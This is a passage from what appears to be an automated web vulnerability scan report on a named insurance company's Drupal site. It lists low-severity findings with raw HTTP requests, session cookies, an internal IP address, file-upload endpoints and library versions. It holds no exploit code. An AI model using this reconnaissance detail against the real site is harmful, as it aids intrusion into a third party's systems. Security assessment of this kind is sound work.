Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD
https://nsiaassurances.ci/index.php/fr/node/28
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD
https://nsiaassurances.ci/pt/node/20
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD
202
Request headers
GET /index.php/en/node/28?name=zFPWdwPk&optionDriver=1&subject=Souscription HTTP/1.1
Referer: https://nsiaassurances.ci/
Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD4RubqPc
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: nsiaassurances.ci
Connection: Keep-alive
Documentation files
Severity Low
Reported by module /Scripts/PerFolder/Readme_Files.script
Description
One or more documentation files (e.g. readme.txt, changelog.txt, ...) were found. The information contained in these files
could help an attacker identify the web application you are using and sometimes the version of the application. It's
recommended to remove these files from production systems.
Impact
These files may disclose sensitive information. This information can be used to launch further attacks.
Recommendation
Affected items
Web Server
Details
203
Documentation files:
https://nsiaassurances.ci/README.txt
---------------------
* About Drupal
* Insta ...
https://nsiaassurances.ci/INSTALL.txt
...
Request headers
GET /README.txt HTTP/1.1
Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD4RubqPc
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: nsiaassurances.ci
Connection: Keep-alive
Insecure Inline Frame (iframe)
Severity Low
Reported by module /httpdata/iframe_sandbox.js
Description
The web page was found to be using an Inline Frame ("iframe") to embed a resource, such as a different web page. The
Inline Frame is either configured insecurely, or not as securely as expected. This vulnerability alert is based on the origin of
the embedded resource and the iframe's sandbox attribute, which can be used to apply security restrictions as well as
exceptions to these restrictions.
Impact
When a web page uses an insecurely configured iframe to embed another web page, the latter may manipulate the former,
and trick its visitors into performing unwanted actions.
Recommendation
Review the iframe's purpose and environment, and use the sandbox attribute to secure the iframe while applying sandbox
directives to ease security restrictions if necessary.
204
References
Affected items
/index.php/pt/node/13
Verified vulnerability
Details
An iframe tag references an external resource, and no sandbox attribute is set.
Request headers
GET /index.php/pt/node/13 HTTP/1.1
Referer: https://nsiaassurances.ci/
Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD4RubqPc;
cookiesjsr=%7B%22base%22%3Afalse%2C%22analytics%22%3Afalse%2C%22facebook_pixel%22%3Afalse
%2C%22video%22%3Afalse%7D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: nsiaassurances.ci
Connection: Keep-alive
Content Security Policy (CSP) not implemented
Severity Informational
Reported by module /httpdata/CSP_not_implemented.js
Description
Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks,
including Cross Site Scripting (XSS) and data injection attacks.
Content Security Policy (CSP) can be implemented by adding a Content-Security-Policy header. The value of this header
is a string containing the policy directives describing your Content Security Policy. To implement CSP, you should define
lists of allowed origins for the all of the types of resources that your site utilizes. For example, if you have a simple site that
needs to load scripts, stylesheets, and images hosted locally, as well as from the jQuery library from their CDN, the CSP
header could look like the following:
205
Content-Security-Policy:
default-src 'self';
It was detected that your web application doesn't implement Content Security Policy (CSP) as the CSP header is missing
from the response. It's recommended to implement Content Security Policy (CSP) into your web application.
Impact
CSP can be used to prevent and/or mitigate attacks that involve content/code injection, such as cross-site scripting/XSS
attacks, attacks that require embedding a malicious resource, attacks that involve malicious use of iframes, such as
clickjacking attacks, and others.
Recommendation
It's recommended to implement Content Security Policy (CSP) into your web application. Configuring Content Security
Policy involves adding the Content-Security-Policy HTTP header to a web page and giving it values to control resources
the user agent is allowed to load for that page.
References
Affected items
Web Server
Details
206
Paths without CSP header:
https://nsiaassurances.ci/en/node/28
https://nsiaassurances.ci/index.php/en/node/28
https://nsiaassurances.ci/fr/node/28
https://nsiaassurances.ci/index.php/pt/node/13
https://nsiaassurances.ci/en/node/19
https://nsiaassurances.ci/cookies/documentation
https://nsiaassurances.ci/index.php/pt/node/28
https://nsiaassurances.ci/index.php/en/node/30
https://nsiaassurances.ci/fr/user/login
https://nsiaassurances.ci/pt/user/register
https://nsiaassurances.ci/fr/node/13
https://nsiaassurances.ci/index.php/user/register/
https://nsiaassurances.ci/index.php/fr/node/28
https://nsiaassurances.ci/index.php/pt/node/18
https://nsiaassurances.ci/themes/custom/nsiasubtheme/css/img/slider/
https://nsiaassurances.ci/index.php/en/system/404
https://nsiaassurances.ci/fr/node/30
https://nsiaassurances.ci/pt/node/20
https://nsiaassurances.ci/img/logo/
https://nsiaassurances.ci/index.php/pt/node/19
https://nsiaassurances.ci/node/16
Request headers
207
GET /en/node/28?name=zFPWdwPk&optionDriver=1&subject=Souscription HTTP/1.1
Referer: https://nsiaassurances.ci/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: nsiaassurances.ci
Connection: Keep-alive
Email addresses
Severity Informational
Reported by module /target/404_text_search.js
Description
One or more email addresses have been found on this website. The majority of spam comes from email addresses
harvested off the internet. The spam-bots (also known as email harvesters and email extractors) are programs that scour
the internet looking for email addresses on any website they come across. Spambot programs look for strings like
[email protected] and then record any addresses found.
Impact
Recommendation
References
Affected items
Web Server
Details
Emails found:
https://nsiaassurances.ci/
[email protected]
https://nsiaassurances.ci/
[email protected]
https://nsiaassurances.ci/
[email protected]
https://nsiaassurances.ci/
208
Request headers
GET / HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: nsiaassurances.ci
Connection: Keep-alive
File uploads
Severity Informational
Reported by module /Crawler/12-Crawler_File_Upload.js
Description
These pages allows visitors to upload files to the server. Various web applications allow users to upload files (such as
pictures, images, sounds, ...). Uploaded files may pose a significant risk if not handled correctly. A remote attacker could
send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
Impact
If the uploaded files are not safely checked an attacker may upload malicious files.
Recommendation
Restrict file types accepted for upload: check the file extension and only allow certain files to be uploaded. Use a whitelist
approach instead of a blacklist. Check for double extensions such as .php.png. Check for files without a filename like
.htaccess (on ASP.NET, check for configuration files like web.config). Change the permissions on the upload folder so the
files within it are not executable. If possible, rename the files that are uploaded.
Affected items
Web Server
Details
209
Pages with file upload forms:
https://nsiaassurances.ci/index.php/en/user/register
https://nsiaassurances.ci/pt/user/register
https://nsiaassurances.ci/index.php/user/register/
https://nsiaassurances.ci/index.php/pt/user/register
https://nsiaassurances.ci/index.php/fr/user/register
https://nsiaassurances.ci/en/user/register
https://nsiaassurances.ci/fr/user/register
Request headers
POST /index.php/en/user/register HTTP/1.1
Referer: https://nsiaassurances.ci/
Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9BgGjanVeQ;
cookiesjsr=%7B%22base%22%3Afalse%2C%22analytics%22%3Afalse%2C%22facebook_pixel%22%3Afalse
%2C%22video%22%3Afalse%7D
Content-Length: 979
210
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: nsiaassurances.ci
Connection: Keep-alive
------------YWJkMTQzNDcw
------------YWJkMTQzNDcw
Content-Type: text/plain
------------YWJkMTQzNDcw
form-09Ykk-NbrC5XZbGRWYCbAhkPxoQ4XvzgjQeV_QVTABE
------------YWJkMTQzNDcw
user_register_form
------------YWJkMTQzNDcw
------------YWJkMTQzNDcw
211
zFPWdwPk
------------YWJkMTQzNDcw
------------YWJkMTQzNDcw
zFPWdwPk
------------YWJkMTQzNDcw
user_picture_0_upload_button=Upload
------------YWJkMTQzNDcw--
HTTP Strict Transport Security (HSTS) not following best practices
Severity Informational
Reported by module /httpdata/HSTS_not_implemented.js
Description
HTTP Strict Transport Security (HSTS) instructs a web browser to only connect to a web site using HTTPS.
It was detected
that your web application's HTTP Strict Transport Security (HSTS) implementation is not as strict as is typically advisable.
Impact
HSTS can be used to prevent and/or mitigate some types of man-in-the-middle (MitM) attacks
Recommendation
It is recommended to implement best practices of HTTP Strict Transport Security (HSTS) in your web application. Consult
web references for more information.
References
hstspreload.org (https://hstspreload.org/)
Affected items
Web Server
Details
212
URLs where HSTS configuration is not according to best practices:
Request headers
GET /en/node/28?name=zFPWdwPk&optionDriver=1&subject=Souscription HTTP/1.1
Referer: https://nsiaassurances.ci/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: nsiaassurances.ci
Connection: Keep-alive
Internal IP address disclosure
Severity Informational
Reported by module /httpdata/text_search.js
Description
One or more strings matching an internal IPv4 address were found. These IPv4 addresses may disclose information about
the IP addressing scheme of the internal network. This information can be used to conduct further attacks.
Impact
213
Possible sensitive information disclosure.
Recommendation
Affected items
Web Server
Details
Pages with internal IPs:
https://nsiaassurances.ci/index.php/en/node/28
172.16.192.72
https://nsiaassurances.ci/en/node/28
172.16.192.72
https://nsiaassurances.ci/fr/node/28
172.16.192.72
https://nsiaassurances.ci/index.php/pt/node/28
172.16.192.72
https://nsiaassurances.ci/index.php/fr/node/28
172.16.192.72
https://nsiaassurances.ci/pt/node/28
172.16.192.72
https://nsiaassurances.ci/node/28
172.16.192.72
Request headers
GET /index.php/en/node/28?name=zFPWdwPk&optionDriver=1&subject=Souscription HTTP/1.1
Referer: https://nsiaassurances.ci/
Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD4RubqPc
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: nsiaassurances.ci
Connection: Keep-alive
Javascript Source map detected
Severity Informational
Reported by module /httpdata/sourcemap_detection.js
Description
214
Client side Javascript source code can be combined, minified or compiled. A source map is a file that maps from the
transformed source to the original source. Source map may help an attacker to read and debug Javascript.
Impact
Access to source maps may help an attacker to read and debug Javascript code. It simplifies finding client-side
vulnerabilities
Recommendation
According to the best practices, source maps should not be accesible for an attacker. Consult web references for more
information
References
Affected items
Web Server
Details
URLs where links to SourceMaps were found:
Request headers
GET /core/assets/vendor/jquery-form/jquery.form.min.js HTTP/1.1
Referer: https://nsiaassurances.ci/
Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD4RubqPc;
cookiesjsr=%7B%22base%22%3Afalse%2C%22analytics%22%3Afalse%2C%22facebook_pixel%22%3Afalse
%2C%22video%22%3Afalse%7D; big_pipe_nojs=1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: nsiaassurances.ci
Connection: Keep-alive
Outdated JavaScript libraries
Severity Informational
Reported by module /deepscan/javascript_library_audit_deepscan.js
215
Description
You are using an outdated version of one or more JavaScript libraries. A more recent version is available. Although your
version was not found to be affected by any security vulnerabilities, it is recommended to keep libraries up to date.
Impact
Recommendation
Affected items
Web Server
Details
jQuery 3.5.1
URL: https://nsiaassurances.ci/en/node/28
Detection method: The library's name and version were determined based on its dynamic behavior.
References:
https://code.jquery.com/
Request headers
GET /en/node/28?name=zFPWdwPk&optionDriver=1&subject=Souscription HTTP/1.1
Referer: https://nsiaassurances.ci/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: nsiaassurances.ci
Connection: Keep-alive
Web Server
Details
Modernizr 3.3.1
URL: https://nsiaassurances.ci/index.php/en/user/register
Detection method: The library's name and version were determined based on its dynamic behavior.
References:
https://github.com/Modernizr/Modernizr/releases
Request headers
POST /index.php/en/user/register HTTP/1.1
Referer: https://nsiaassurances.ci/
216
Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9BgGjanVeQ;
cookiesjsr=%7B%22base%22%3Afalse%2C%22analytics%22%3Afalse%2C%22facebook_pixel%22%3Afalse
%2C%22video%22%3Afalse%7D
Content-Length: 979
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: nsiaassurances.ci
Connection: Keep-alive
------------YWJkMTQzNDcw
------------YWJkMTQzNDcw
Content-Type: text/plain
------------YWJkMTQzNDcw
form-09Ykk-NbrC5XZbGRWYCbAhkPxoQ4XvzgjQeV_QVTABE
------------YWJkMTQzNDcw
user_register_form
------------YWJkMTQzNDcw
217
------------YWJkMTQzNDcw
zFPWdwPk
------------YWJkMTQzNDcw
------------YWJkMTQzNDcw
zFPWdwPk
------------YWJkMTQzNDcw
user_picture_0_upload_button=Upload
------------YWJkMTQzNDcw--
Permissions-Policy header not implemented
Severity Informational
Reported by module /httpdata/permissions_policy.js
Description
The Permissions-Policy header allows developers to selectively enable and disable use of various browser features and
APIs.
Impact
Recommendation
References
Affected items
Web Server
218
Details
Locations without Permissions-Policy header:
https://nsiaassurances.ci/en/node/28
https://nsiaassurances.ci/index.php/en/node/28
https://nsiaassurances.ci/fr/node/28
https://nsiaassurances.ci/index.php/pt/node/13
https://nsiaassurances.ci/en/node/19
https://nsiaassurances.ci/index.php/en/user/register
https://nsiaassurances.ci/pt/user/register
https://nsiaassurances.ci/cookies/documentation
https://nsiaassurances.ci/index.php/pt/node/28
https://nsiaassurances.ci/index.php/en/node/30
https://nsiaassurances.ci/core/themes/stable/images/core/icons/000000/
https://nsiaassurances.ci/index.php/user/login/
https://nsiaassurances.ci/fr/user/login
https://nsiaassurances.ci/fr/node/13
https://nsiaassurances.ci/index.php/user/register/
https://nsiaassurances.ci/index.php/fr/node/28
https://nsiaassurances.ci/index.php/pt/node/18
https://nsiaassurances.ci/themes/custom/nsiasubtheme/css/img/slider/
https://nsiaassurances.ci/index.php/en/system/404
https://nsiaassurances.ci/fr/node/30
https://nsiaassurances.ci/pt/node/20
Request headers
GET /en/node/28?name=zFPWdwPk&optionDriver=1&subject=Souscription HTTP/1.1
Referer: https://nsiaassurances.ci/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: nsiaassurances.ci
Connection: Keep-alive
Reverse proxy detected
Severity Informational
Reported by module /target/RevProxy_Detection.js
Description
This server uses a reverse proxy, a load balancer or a CDN (Content Delivery Network) or it's hosted in a cloud provider.
Acunetix detected this by sending various payloads and detecting changes in headers and body.
Impact
219
Recommendation
None
Affected items
Web Server
Details
Detected reverse proxy: Apache httpd
Request headers
GET / HTTP/1.1
Max-Forwards: 0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: nsiaassurances.ci
Connection: Keep-alive
Subresource Integrity (SRI) not implemented
Severity Informational
Reported by module /RPA/SRI_Not_Implemented.js
Description
Subresource Integrity (SRI) is a security feature that enables browsers to verify that third-party resources they fetch (for
example, from a CDN) are delivered without unexpected manipulation. It works by allowing developers to provide a
cryptographic hash that a fetched file must match.
Third-party resources (such as scripts and stylesheets) can be manipulated. An attacker that has access or has hacked the
hosting CDN can manipulate or replace the files. SRI allows developers to specify a base64-encoded cryptographic hash of
the resource to be loaded. The integrity attribute containing the hash is then added to the <script> HTML element tag. The
integrity string consists of a base64-encoded hash, followed by a prefix that depends on the hash algorithm. This prefix can
either be sha256, sha384 or sha512.
The script loaded from the external URL specified in the Details section doesn't implement Subresource Integrity (SRI). It's
recommended to implement Subresource Integrity (SRI) for all the scripts loaded from external hosts.
Impact
An attacker that has access or has hacked the hosting CDN can manipulate or replace the files.
Recommendation
Use the SRI Hash Generator link (from the References section) to generate a <script> element that implements
Subresource Integrity (SRI).
220
For example, you can use the following <script> element to tell a browser that before executing the
https://example.com/example-framework.js script, the browser must first compare the script to the expected hash, and
verify that there's a match.
<script src="https://example.com/example-framework.js"
integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"
crossorigin="anonymous"></script>
References
Affected items
Web Server
Details
Pages where SRI is not implemented:
https://nsiaassurances.ci/
https://nsiaassurances.ci/
Request headers
GET / HTTP/1.1
Referer: https://nsiaassurances.ci/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: nsiaassurances.ci
Connection: Keep-alive
/index.php/en/node/28
Details
221
Pages where SRI is not implemented:
https://nsiaassurances.ci/index.php/en/node/28
https://nsiaassurances.ci/index.php/en/node/28
Request headers
GET /index.php/en/node/28?name=zFPWdwPk&optionDriver=1&subject=Souscription HTTP/1.1
Referer: https://nsiaassurances.ci/
Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD4RubqPc
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: nsiaassurances.ci
Connection: Keep-alive
/node/22
Details
Pages where SRI is not implemented:
https://nsiaassurances.ci/node/22
https://nsiaassurances.ci/node/22
https://nsiaassurances.ci/node/22
Request headers
222
GET /node/22 HTTP/1.1
Referer: https://nsiaassurances.ci/
Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=RP4yUamacBA19nHaUpqAsP64rOH9hsspNoHSMPb_xzY;
big_pipe_nojs=1;
cookiesjsr=%7B%22base%22%3Afalse%2C%22analytics%22%3Afalse%2C%22facebook_pixel%22%3Afalse
%2C%22video%22%3Afalse%7D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: nsiaassurances.ci
Connection: Keep-alive
/pt/node/22
Details
Pages where SRI is not implemented:
https://nsiaassurances.ci/pt/node/22
https://nsiaassurances.ci/pt/node/22
https://nsiaassurances.ci/pt/node/22
Request headers
223
GET /pt/node/22 HTTP/1.1
Referer: https://nsiaassurances.ci/
Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD4RubqPc;
cookiesjsr=%7B%22base%22%3Afalse%2C%22analytics%22%3Afalse%2C%22facebook_pixel%22%3Afalse
%2C%22video%22%3Afalse%7D; big_pipe_nojs=1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: nsiaassurances.ci
Connection: Keep-alive
224
Scanned items (coverage report)
https://nsiaassurances.ci/
https://nsiaassurances.ci/index.php/en/node/28
https://nsiaassurances.ci/index.php/pt/node/13
https://nsiaassurances.ci/node/22
https://nsiaassurances.ci/pt/node/22
225